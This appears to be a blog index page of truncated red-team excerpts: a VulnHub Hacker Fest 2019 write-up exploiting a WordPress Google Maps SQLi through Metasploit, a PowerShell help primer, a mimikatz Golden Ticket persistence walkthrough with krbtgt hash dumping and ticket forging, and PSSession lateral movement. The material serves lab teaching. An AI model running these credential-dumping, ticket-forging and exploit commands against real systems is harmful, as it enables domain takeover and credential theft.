Vulnerable Machine Writeup * VULNHUB

HACKER FEST 2019 (VULNHUB)

Vulnhub Link: https://download.vulnhub.com/hackerfest/HF2019-Linux.ova

Scan the target:
root@kali:~# nmap -A 192.168.0.20
Open ports: 21, 22, 80, 10000

Enumeration: http://192.168.0.20 (WordPress)

Now on the terminal:
root@kali:~# wpscan --url http://192.168.0.20/

WordPress Google Maps SQLi exploit (the plugin flaw wpscan reports), via Metasploit:
msf5 > use auxiliary/admin/http/wp_google_maps_sqli
msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 192.168.0.20
msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit

We get the output (a WordPress phpass hash for the webmaster user):
webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl

Save it to a file for cracking:
root@kali:~# gedit hash webmaster […]

Powershell * RED TEAM SECURITY

PowerShell Beginner

PowerShell help system

List everything which contains the word process:
PS C:\Users\victim6\Downloads\new\new> get-help *process*

List the conceptual "about_" topics:
PS C:\Users\victim6\Downloads\new\new> get-help about_*

Show the PowerShell version (help commands below assume v3+):
PS C:\Users\victim6\Downloads\new\new> $psversiontable

Help for one parameter of a cmdlet:
PS C:\Users\victim6\Downloads\new\new> get-help Get-Process -Parameter name

List every help topic:
PS C:\Users\victim6\Downloads\new\new> get-help *

Update the help system (v3+, needs internet access or a -SourcePath):
PS C:\Users\victim6\Downloads\new\new> update-help

List help about a topic (add -Full for the complete text, -Examples for examples only):
PS C:\Users\victim6\Downloads\new\new> get-help get-item

Lists examples of how […]

Powershell * RED TEAM SECURITY

Persistence Flow

Persistence technique: Golden Ticket

Step 1. Get the krbtgt NTLM hash and the domain SID. Execute mimikatz on the DC:
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch -computername WIN-2RUMVG5JPOC

Or the same with PowerSploit's Invoke-Mimikatz:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Step 2. On any domain-joined machine, forge a TGT for the administrator account (RID 500, group 513) and inject it into the current session (/ptt):
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::golden /user:administrator /domain:security.local /sid:S-1-5-21-2515352101-914078745-3278884511-1001 /krbtgt:30ca30e0cbc0f87b2f5bac01794a2357 /id:500 /groups:513 /ptt"'

The forged ticket stays valid until the krbtgt password is changed twice, which is why this counts as persistence rather than just privilege escalation.

To use the DCSync feature for getting the krbtgt hash (no code execution on the DC needed), execute the below command with DA privileges for […]

Powershell * RED TEAM SECURITY

Lateral Movement Protocols And Tools

One-to-one: PSSession
Interactive, runs in a new process (wsmprovhost) on the target, and is stateful: variables and loaded modules survive between commands.
Useful cmdlets: New-PSSession, Enter-PSSession

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> New-PSSession -ComputerName WIN-2RUMVG5JPOC
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Enter-PSSession -Session $sess
[WIN-2RUMVG5JPOC]: PS C:\Users\Administrator\Documents> hostname

One-to-many: also known as fan-out remoting.
Non-interactive; executes the commands on all targets in parallel.
Useful cmdlets: Invoke-Command
Invoke-Command: run commands & scripts on […]